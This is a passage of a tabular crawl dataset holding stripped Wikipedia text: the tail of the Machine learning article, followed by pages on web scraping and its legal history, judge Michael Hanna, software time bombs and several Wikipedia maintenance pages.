Bayesian networks that model sequences of variables, like speech signals or protein sequences, are called dynamic Bayesian networks. Generalizations of Bayesian networks that can represent and solve decision problems under uncertainty are called influence diagrams. A Gaussian process is a stochastic process in which every finite collection of the random variables in the process has a multivariate normal distribution, and it relies on a pre-defined covariance function, or kernel, that models how pairs of points relate to each other depending on their locations. Given a set of observed points, or input output examples, the distribution of the (unobserved) output of a new point as function of its input data can be directly computed by looking like the observed points and the covariances between those points and the new, unobserved point. Gaussian processes are popular surrogate models in Bayesian optimization used to do hyperparameter optimization. A genetic algorithm (GA) is a search algorithm and heuristic technique that mimics the process of natural selection, using methods such as mutation and crossover to generate new genotypes in the hope of finding good solutions to a given problem. In machine learning, genetic algorithms were used in the 1980s and 1990s. 92 93 Conversely, machine learning techniques have been used to improve the performance of genetic and evolutionary algorithms. 94 The theory of belief functions, also referred to as evidence theory or Dempster Shafer theory, is a general framework for reasoning with uncertainty, with understood connections to other frameworks such as probability, possibility and imprecise probability theories. These theoretical frameworks can be thought of as a kind of learner and have some analogous properties of how evidence is combined (e.g., Dempster's rule of combination), just like how in a pmf-based Bayesian approach clarification needed would combine probabilities. However, there are many caveats to these beliefs functions when compared to Bayesian approaches in order to incorporate ignorance and uncertainty quantification. These belief function approaches that are implemented within the machine learning domain typically leverage a fusion approach of various ensemble methods to better handle the learner's decision boundary, low samples, and ambiguous class issues that standard machine learning approach tend to have difficulty resolving. 4 9 However, the computational complexity of these algorithms are dependent on the number of propositions (classes), and can lead to a much higher computation time when compared to other machine learning approaches. Typically, machine learning models require a high quantity of reliable data to perform accurate predictions. When training a machine learning model, machine learning engineers need to target and collect a large and representative sample of data. Data from the training set can be as varied as a corpus of text, a collection of images, sensor data, and data collected from individual users of a service. Overfitting is something to watch out for when training a machine learning model. Trained models derived from biased or non-evaluated data can result in skewed or undesired predictions. Biased models may result in detrimental outcomes, thereby furthering the negative impacts on society or objectives. Algorithmic bias is a potential result of data not being fully prepared for training. Machine learning ethics is becoming a field of study and notably, becoming integrated within machine learning engineering teams. Federated learning is an adapted form of distributed artificial intelligence to training machine learning models that decentralizes the training process, allowing for users' privacy to be maintained by not needing to send their data to a centralized server. This also increases efficiency by decentralizing the training process to many devices. For example, Gboard uses federated machine learning to train search query prediction models on users' mobile phones without having to send individual searches back to Google. 95 There are many applications for machine learning, including: In 2006, the media-services provider Netflix held the first "Netflix Prize" competition to find a program to better predict user preferences and improve the accuracy of its existing Cinematch movie recommendation algorithm by at least 10%. A joint team made up of researchers from AT T Labs-Research in collaboration with the teams Big Chaos and Pragmatic Theory built an ensemble model to win the Grand Prize in 2009 for $1 million. 98 Shortly after the prize was awarded, Netflix realized that viewers' ratings were not the best indicators of their viewing patterns ("everything is a recommendation") and they changed their recommendation engine accordingly. 99 In 2010 The Wall Street Journal wrote about the firm Rebellion Research and their use of machine learning to predict the financial crisis. 100 In 2012, co-founder of Sun Microsystems, Vinod Khosla, predicted that 80% of medical doctors jobs would be lost in the next two decades to automated machine learning medical diagnostic software. 101 In 2014, it was reported that a machine learning algorithm had been applied in the field of art history to study fine art paintings and that it may have revealed previously unrecognized influences among artists. 102 In 2019 Springer Nature published the first research book created using machine learning. 103 In 2020, machine learning technology was used to help make diagnoses and aid researchers in developing a cure for COVID 19. 104 Machine learning was recently applied to predict the pro-environmental behavior of travelers. 105 Recently, machine learning technology was also applied to optimize smartphone's performance and thermal behavior based on the user's interaction with the phone. 106 107 108 When applied correctly, machine learning algorithms (MLAs) can utilize a wide range of company characteristics to predict stock returns without overfitting. By employing effective feature engineering and combining forecasts, MLAs can generate results that far surpass those obtained from basic linear techniques like OLS. 109 Recent advancements in machine learning have extended into the field of quantum chemistry, where novel algorithms now enable the prediction of solvent effects on chemical reactions, thereby offering new tools for chemists to tailor experimental conditions for optimal outcomes. 110 Machine Learning is becoming a useful tool to investigate and predict evacuation decision making in large scale and small scale disasters. Different solutions have been tested to predict if and when householders decide to evacuate during wildfires and hurricanes. 111 112 113 Other applications have been focusing on pre evacuation decisions in building fires. 114 115 Although machine learning has been transformative in some fields, machine-learning programs often fail to deliver expected results. 116 117 118 Reasons for this are numerous: lack of (suitable) data, lack of access to the data, data bias, privacy problems, badly chosen tasks and algorithms, wrong tools and people, lack of resources, and evaluation problems. 119 The "black box theory" poses another yet significant challenge. Black box refers to a situation where the algorithm or the process of producing an output is entirely opaque, meaning that even the coders of the algorithm cannot audit the pattern that the machine extracted out of the data. 120 The House of Lords Select Committee, which claimed that such an “intelligence system” that could have a “substantial impact on an individual’s life” would not be considered acceptable unless it provided “a full and satisfactory explanation for the decisions” it makes. 120 In 2018, a self-driving car from Uber failed to detect a pedestrian, who was killed after a collision. 121 Attempts to use machine learning in healthcare with the IBM Watson system failed to deliver even after years of time and billions of dollars invested. 122 123 Microsoft's Bing Chat chatbot has been reported to produce hostile and offensive response against its users. 124 Machine learning has been used as a strategy to update the evidence related to a systematic review and increased reviewer burden related to the growth of biomedical literature. While it has improved with training sets, it has not yet developed sufficiently to reduce the workload burden without limiting the necessary sensitivity for the findings research themselves. 125 Different machine learning approaches can suffer from different data biases. A machine learning system trained specifically on current customers may not be able to predict the needs of new customer groups that are not represented in the training data. When trained on human-made data, machine learning is likely to pick up the constitutional and unconscious biases already present in society. 126 Language models learned from data have been shown to contain human-like biases. 127 128 In an experiment carried out by ProPublica, an investigative journalism organization, a machine learning algorithm's insight into the recidivism rates among prisoners falsely flagged "black defendants high risk twice as often as white defendants. 129 In 2015, Google Photos would often tag black people as gorillas, 129 and in 2018, this still was not well resolved, but Google reportedly was still using the workaround to remove all gorillas from the training data and thus was not able to recognize real gorillas at all. 130 Similar issues with recognizing non-white people have been found in many other systems. 131 In 2016, Microsoft tested Tay, a chatbot that learned from Twitter, and it quickly picked up racist and sexist language. 132 Because of such challenges, the effective use of machine learning may take longer to be adopted in other domains. 133 Concern for fairness in machine learning, that is, reducing bias in machine learning and propelling its use for human good, is increasingly expressed by artificial intelligence scientists, including Fei-Fei Li, who reminds engineers that t here's nothing artificial about AI. It's inspired by people, it's created by people, and—most importantly—it impacts people. It is a powerful tool we are only just beginning to understand, and that is a profound responsibility. 134 Explainable AI (XAI), or Interpretable AI, or Explainable Machine Learning (XML), is artificial intelligence (AI) in which humans can understand the decisions or predictions made by the AI. 135 It contrasts with the "black box" concept in machine learning where even its designers cannot explain why an AI arrived at a specific decision. 136 By refining the mental models of users of AI-powered systems and dismantling their misconceptions, XAI promises to help users perform more effectively. XAI may be an implementation of the social right to explanation. Settling on a bad, overly complex theory gerrymandered to fit all the past training data is known as overfitting. Many systems attempt to reduce overfitting by rewarding a theory in accordance with how well it fits the data but penalizing the theory in accordance with how complex the theory is. 137 Learners can also disappoint by "learning the wrong lesson". A toy example is that an image classifier trained only on pictures of brown horses and black cats might conclude that all brown patches are likely to be horses. 138 A real-world example is that, unlike humans, current image classifiers often do not primarily make judgments from the spatial relationship between components of the picture, and they learn relationships between pixels that humans are oblivious to, but that still correlate with images of certain types of real objects. Modifying these patterns on a legitimate image can result in "adversarial" images that the system misclassifies. 139 140 Adversarial vulnerabilities can also result in nonlinear systems, or from non-pattern perturbations. For some systems, it is possible to change the output by only changing a single adversarially chosen pixel. 141 Machine learning models are often vulnerable to manipulation and or evasion via adversarial machine learning. 142 Researchers have demonstrated how backdoors can be placed undetectably into classifying (e.g., for categories "spam" and well-visible "not spam" of posts) machine learning models that are often developed and or trained by third parties. Parties can change the classification of any input, including in cases for which a type of data software transparency is provided, possibly including white-box access. 143 144 145 Classification of machine learning models can be validated by accuracy estimation techniques like the holdout method, which splits the data in a training and test set (conventionally 2 3 training set and 1 3 test set designation) and evaluates the performance of the training model on the test set. In comparison, the K-fold-cross-validation method randomly partitions the data into K subsets and then K experiments are performed each respectively considering 1 subset for evaluation and the remaining K 1 subsets for training the model. In addition to the holdout and cross-validation methods, bootstrap, which samples n instances with replacement from the dataset, can be used to assess model accuracy. 146 In addition to overall accuracy, investigators frequently report sensitivity and specificity meaning True Positive Rate (TPR) and True Negative Rate (TNR) respectively. Similarly, investigators sometimes report the false positive rate (FPR) as well as the false negative rate (FNR). However, these rates are ratios that fail to reveal their numerators and denominators. The total operating characteristic (TOC) is an effective method to express a model's diagnostic ability. TOC shows the numerators and denominators of the previously mentioned rates, thus TOC provides more information than the commonly used receiver operating characteristic (ROC) and ROC's associated area under the curve (AUC). 147 Machine learning poses a host of ethical questions. Systems that are trained on datasets collected with biases may exhibit these biases upon use (algorithmic bias), thus digitizing cultural prejudices. 148 For example, in 1988, the UK's Commission for Racial Equality found that St. George's Medical School had been using a computer program trained from data of previous admissions staff and that this program had denied nearly 60 candidates who were found to either be women or have non-European sounding names. 126 Using job hiring data from a firm with racist hiring policies may lead to a machine learning system duplicating the bias by scoring job applicants by similarity to previous successful applicants. 149 150 Another example includes predictive policing company Geolitica's predictive algorithm that resulted in “disproportionately high levels of over-policing in low-income and minority communities” after being trained with historical crime data. 129 While responsible collection of data and documentation of algorithmic rules used by a system is considered a critical part of machine learning, some researchers blame lack of participation and representation of minority population in the field of AI for machine learning's vulnerability to biases. 151 In fact, according to research carried out by the Computing Research Association (CRA) in 2021, “female faculty merely make up 16.1% of all faculty members who focus on AI among several universities around the world. 152 Furthermore, among the group of “new U.S. resident AI PhD graduates, 45% identified as white, 22.4% as Asian, 3.2% as Hispanic, and 2.4% as African American, which further demonstrates a lack of diversity in the field of AI. 152 AI can be well-equipped to make decisions in technical fields, which rely heavily on data and historical information. These decisions rely on objectivity and logical reasoning. 153 Because human languages contain biases, machines trained on language corpora will necessarily also learn these biases. 154 155 Other forms of ethical challenges, not related to personal biases, are seen in health care. There are concerns among health care professionals that these systems might not be designed in the public's interest but as income-generating machines. 156 This is especially true in the United States where there is a long-standing ethical dilemma of improving health care, but also increasing profits. For example, the algorithms could be designed to provide patients with unnecessary tests or medication in which the algorithm's proprietary owners hold stakes. There is potential for machine learning in health care to provide professionals an additional tool to diagnose, medicate, and plan recovery paths for patients, but this requires these biases to be mitigated. 157 Since the 2010s, advances in both machine learning algorithms and computer hardware have led to more efficient methods for training deep neural networks (a particular narrow subdomain of machine learning) that contain many layers of nonlinear hidden units. 158 By 2019, graphic processing units (GPUs), often with AI-specific enhancements, had displaced CPUs as the dominant method of training large-scale commercial cloud AI. 159 OpenAI estimated the hardware computing used in the largest deep learning projects from AlexNet (2012) to AlphaZero (2017), and found a 300,000 fold increase in the amount of compute required, with a doubling-time trendline of 3.4 months. 160 161 A physical neural network or Neuromorphic computer is a type of artificial neural network in which an electrically adjustable material is used to emulate the function of a neural synapse. "Physical" neural network is used to emphasize the reliance on physical hardware used to emulate neurons as opposed to software-based approaches. More generally the term is applicable to other artificial neural networks in which a memristor or other electrically adjustable resistance material is used to emulate a neural synapse. 162 163 Embedded Machine Learning is a sub-field of machine learning, where the machine learning model is run on embedded systems with limited computing resources such as wearable computers, edge devices and microcontrollers. 164 165 166 Running machine learning model in embedded devices removes the need for transferring and storing data on cloud servers for further processing, henceforth, reducing data breaches and privacy leaks happening because of transferring data, and also minimizes theft of intellectual properties, personal data and business secrets. Embedded Machine Learning could be applied through several techniques including hardware acceleration, 167 168 using approximate computing, 169 optimization of machine learning models and many more. 170 171 Pruning, Quantization, Knowledge Distillation, Low-Rank Factorization, Network Architecture Search (NAS) Parameter Sharing are few of the techniques used for optimization of machine learning models. Software suites containing a variety of machine learning algorithms include the following: |
227 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Category:CS1_French-language_sources_(fr) | This is a tracking category for CS1 citations that use the parameter language fr to identify a source in French. Pages in this category should only be added by CS1 templates and Module:Citation CS1. The following 200 pages are in this category, out of approximately 168,206 total. This list may not reflect recent changes. The following 10 files are in this category, out of 10 total. |
228 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Special:SpecialPages | This page contains a list of special pages. Most of the content of these pages is automatically generated and cannot be edited. To suggest a change to the parts that can be edited, find the appropriate text on Special:AllMessages and then request your change on the talk page of the message (using editprotected to draw the attention of administrators). You can also see what message names are used on a page by adding ?uselang qqx to the end of its URL, e.g. https: en.wikipedia.org wiki Special:SpecialPages?uselang qqx will show (specialpages-summary) in place of this message, which allows you to find MediaWiki:Specialpages-summary. For an index of special pages, see Help:SpecialPages. |
229 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Michael_Hanna_(judge) | Michael Anthony Patrick Hanna is a retired Irish judge who served as a Judge of the High Court from 2004 to 2023. Hanna originates from Belfast and was educated at St MacNissi's College. His father was Frank Hanna, a Northern Ireland Labour Party MP. 1 He was educated at Trinity College Dublin and the King's Inns. 2 He is a former auditor of the College Historical Society. 3 He became a barrister in 1976 and a senior counsel in 1996. 2 Hanna's practice was focused on the Dublin and South-Eastern circuits, where he specialised in personal injury cases and the law of tort. 2 Criminal cases also formed part of his practice. 4 Hanna was appointed to the High Court in 2004. 5 6 He was appointed following recommendation by the Judicial Appointments Advisory Board. 7 He presided over a planning law case involving Van Morrison and his wife Michelle Rocca in 2010. 8 He was the judge in a 2011 case taken by Ryanair against a German ticket sale website, in which he held that ticket scraping was a breach of Ryanair's website terms. This was considered to be the first Irish case involving the enforceability of online terms of service. 9 He often acted as judge at the Court of Criminal Appeal, prior to its disbandment following the establishment of the Court of Appeal. 10 He frequently heard personal injuries cases when he was on the bench of the High Court. He applied a test of "ordinary common sense" to assess evidence in a personal injuries case involving a woman who had slipped in a car park. 11 This test was endorsed in a judgment of Mary Irvine in the Court of Appeal. 12 His final sitting as a judge was on 13 July 2023. 13 14 He became ill while in Spain in 2014 and was in an induced coma. He was unable to hear cases for a period of time following. 10 Hanna is a singer of opera. 15 |
230 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_note-30 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
231 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Time_bomb_(software) | In computer software, a time bomb is part of a computer program that has been written so that it will start or stop functioning after a predetermined date or time is reached. The term "time bomb" does not refer to a program that stops functioning a specific number of days after it is installed; instead, the term "trialware" applies. Time bombs are commonly used in beta (pre-release) software when the manufacturer of the software does not want the beta version being used after the final release date. One example of time bomb software would be Microsoft's Windows Vista Beta 2, which was programmed to expire on May 31, 2007. 1 The time limits on time bomb software are not usually as heavily enforced as they are on trial software, since time bomb software does not usually implement secure clock functions. The first use of a time bomb in software may have been in 1979 with the Scribe markup language and word processing system, developed by Brian Reid. Reid sold Scribe to a software company called Unilogic (later renamed Scribe Systems 2 ), and agreed to insert a set of time-dependent functions (called "time bombs") that would deactivate freely copied versions of the program after a 90 day expiration date. To avoid deactivation, users paid the software company, which then issued a code that defused the internal time bomb feature. 3 Richard Stallman saw this as a betrayal of the programmer ethos. Instead of honoring the notion of share-and-share alike, Reid had inserted a way for companies to compel programmers to pay for information access 4 (see Events leading to GNU). The main differences between logic bombs and time bombs is that a logic bomb may have a timing function implemented into it as a failsafe if the conditions are not met in a certain time period (it may delete itself or activate its payload using the timing system), while time bombs only use timing functions to (de)activate themselves. Time bombs, once activated, will unload their payload (which may be malicious) in a similar way logic bombs deliver their payloads to the target. The main difference between both time and logic bombs, and fork bombs, is that a fork bomb has no payload per se, and instead does its damage by continually replicating itself to deplete available system resources. This computer-programming-related article is a stub. You can help Wikipedia by expanding it. |
232 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Wikipedia:Community_portal | This page provides a listing of current collaborations, tasks, and news about English Wikipedia. New to Wikipedia? See the contributing to Wikipedia page or our tutorial for everything you need to know to get started. For a listing of internal project pages of interest, see the department directory. For a listing of ongoing discussions and current requests, see the Dashboard. Welcome to the community bulletin board, which is a page used for announcements from WikiProjects and other groups. Included here are coordinated efforts, events, projects, and other general announcements. Yearly or infrequent events Monthly or continuous events Also consider posting WikiProject, Task Force, and Collaboration news at The Signpost's WikiProject Report page. Please include your signature when adding a listing here. Latest tech news from the Wikimedia technical community. Please tell other users about these changes. Not all changes will affect you. Translations are available. Feature news Project updates Tech news prepared by Tech News writers and posted by bot Contribute Translate Get help Give feedback Subscribe or unsubscribe. Discussions in the following areas have requested wider attention via Requests for comment: You can help improve the articles listed below This list updates frequently, so check back here for more tasks to try. (See Wikipedia:Maintenance or the Task Center for further information.) Help counter systemic bias by creating new articles on important women. Help improve popular pages, especially those of low quality. This week's article for improvement is: Social experiment Previous selections: Happiness List of public art in Chicago Cape (geography) This week's backlog of the week is: Category:Pages with reference errors What is an appropriate length for a Wikipedia article? This is discussed at Article length. An article can be as long as 10,000 words or more, if there are enough sources on the topic to provide for that much content. Undoubtedly there are articles that reach 20,000 words. The recommended maximum length is around 100kB of text. There is no standard for minimum length, an acceptable stub article could be as short as three or four sentences. If you look at the menu on the right-hand side of any page on Wikipedia, there is a link to Page information. Clicking on that link shows lots of information about the page including its total size as well as how often it has been viewed. There is also this tool - you just copy and paste the text into there, and it counts it for you. Kindness Campaign |
233 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_ref-25 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with 